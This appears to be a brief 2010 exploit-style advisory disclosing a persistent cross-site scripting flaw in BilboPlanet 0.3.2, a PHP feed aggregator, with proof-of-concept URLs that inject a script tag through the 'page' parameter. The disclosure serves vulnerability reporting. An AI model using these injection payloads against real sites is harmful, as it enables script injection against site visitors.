###########################################
#
# Script Name : BilboPlanet 0.3.2
#
# Version : 0.3.2
#
# Bug Type : Persistent XSS Vulnerability
#
# Found by : Metropolis
#
# Home : http://metropolis.fr.cr
#
# Discovered : 26/07/2010
#
# Download app : http://www.bilboplanet.com/downloads/bilboplanet-0.3.2.tar.gz
#
# Description:
#
# In online media, Planet is a feed aggregator application designed to collect posts from the weblogs of members of an Internet community and display them on a single page.
# Planet runs on a web server. It creates pages with entries from the original feeds in chronological order, most recent entries first.
# BilboPlanet is an Open Source RSS feed aggregator written in PHP.
#
###########################################
PoC :
http://[target]/[path]/?page=1[XSS]
http://[target]/[path]/index.php?page=1[XSS]
http://[target]/[path]/?tri=day&page=1[XSS]
local Example :
http://localhost/bilboplanet/?page=1"><script>alert(31337);</script>
http://localhost/bilboplanet/index.php?page=1"><script>alert(31337);</script>
http://localhost/bilboplanet/?tri=day&page=1"><script>alert(31337);</script>